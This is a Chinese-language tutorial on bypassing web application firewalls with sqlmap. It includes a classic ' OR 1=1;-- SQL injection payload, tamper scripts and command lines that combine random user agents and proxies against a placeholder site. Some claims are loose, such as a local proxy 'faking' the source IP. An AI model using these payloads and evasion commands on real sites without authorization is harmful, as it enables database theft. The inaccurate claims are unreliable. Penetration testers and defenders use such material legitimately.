SQLMAP繞過WAF技巧

一、WAF簡介

Web應用程序防火牆（Web Application Firewall，WAF）是基於Web應用程序的一種安全防護系統。它可以對來自客戶端的請求進行監控和分析，並且可以防止一系列攻擊，例如SQL注入、跨站腳本攻擊、文件注入等等。然而，即使是最先進的WAF也可能存在漏洞。

二、SQL注入漏洞

SQL注入漏洞是一種最為常見的Web應用程序攻擊方式，攻擊者可通過Web表單提交惡意SQL語句，篡改數據庫查詢語句的行為，使得攻擊者能夠從數據庫中獲取數據，甚至能夠對數據庫進行破壞。

下面是一段簡單的SQL語句：

SELECT * FROM users WHERE username = 'admin' AND password = 'password';

該語句的作用是查詢數據庫中的用戶表，查找用戶名為’admin’，密碼為’password’的用戶。

但如果攻擊者在表單中提交以下SQL代碼：

' OR 1=1;--

那麼注入後的SQL語句將成為：

SELECT * FROM users WHERE username = '' OR 1=1;--' AND password = 'password';

此時，原先的WHERE條件已被註銷，AND後面的語句也將被注釋掉，攻擊者將得到users表中所有的數據。

三、SQLMAP簡介

SQLMAP是一款集成了很多SQL注入工具的開源工具，可以自動化地執行SQL注入測試，從而獲取目標站點的數據庫中的敏感數據。

四、SQLMAP繞過WAF技巧

1. 使用tamper擴展

SQLMAP的tamper選項提供了一種將HTTP請求中的參數進行修改的方法，可以通過修改請求參數的方式，使得WAF不能檢測到SQL注入攻擊。

下面是一個基本的使用示例：

python sqlmap.py -u "http://example.com/index.php?id=1" --tamper=space2comment

其中，–tamper選項用於指定要使用的tamper腳本，space2comment是其中的一個腳本，將空格轉換為SQL注釋，從而可以繞過一些簡單的WAF。

2. 定製tamper腳本

當內置的tamper腳本不能繞過WAF時，可以自行編寫tamper腳本，來對請求進行修改。

下面是一個定製tamper腳本的示例：

def tamper(payload, **kwargs):
    return payload.replace(" ", "/**/")

# 調用tamper腳本
python sqlmap.py -u "http://example.com/index.php?id=1" --tamper=mytamper.py 

該腳本將空格替換為/**/，這可以使SQL注入繞過簡單的WAF。

3. 使用不同的HTTP請求方法

對於一些WAF，只對GET請求進行過濾，而對其他HTTP請方法（例如POST，PUT）沒有進行過濾。因此，可以通過修改HTTP請求方法來繞過這些WAF。

下面是一個基本的使用示例：

python sqlmap.py -u "http://example.com/index.php?id=1" --method=POST

其中，–method選項用於指定要使用的HTTP請求方法，這裡指定為POST請求。

4. 使用隨機偽造HTTP頭部信息

有些WAF會檢查HTTP頭部信息，如果發現一些異常的請求頭，就會將這個請求認為有威脅。因此，可以通過隨機偽造HTTP頭部信息的方式，來模糊WAF的檢測。

下面是一個基本的使用示例：

python sqlmap.py -u "http://example.com/index.php?id=1" --random-agent

其中，–random-agent選項將會隨機生成HTTP頭信息。

5. 使用代理偽造IP地址

如果WAF根據IP地址進行檢測，可以通過使用代理偽造IP地址的方式進行繞過。

下面是一個基本的使用示例：

python sqlmap.py -u "http://example.com/index.php?id=1" --proxy=http://localhost:8080

其中，–proxy選項將會把請求發送到代理服務器，代理服務器會將請求偽造成來自於另一個IP地址的請求。

6. 使用多種繞過技巧組合使用

有些WAF會使用多種繞過技巧來防止SQL注入攻擊，因此我們需要組合多個繞過技巧，才能夠成功地繞過這些WAF。

下面是一個使用多項繞過技巧組合的示例：

python sqlmap.py -u "http://example.com/index.php?id=1" --tamper=space2comment --random-agent --proxy=http://localhost:8080

該命令使用了space2comment tamper腳本、隨機生成HTTP頭部信息和使用代理服務器偽造IP地址的方式，組合使用這些技巧，可以較為全面地繞過WAF。

總結

在現實世界中，很多Web應用程序都使用WAF來保護自己的安全，但是即使最先進的WAF也可能存在漏洞。使用SQLMAP來檢測和利用WAF漏洞，是一種非常有效的方法。通過使用tamper腳本、隨機修改HTTP頭部信息和偽造IP地址等方式，可以成功地繞過大多數WAF的防禦。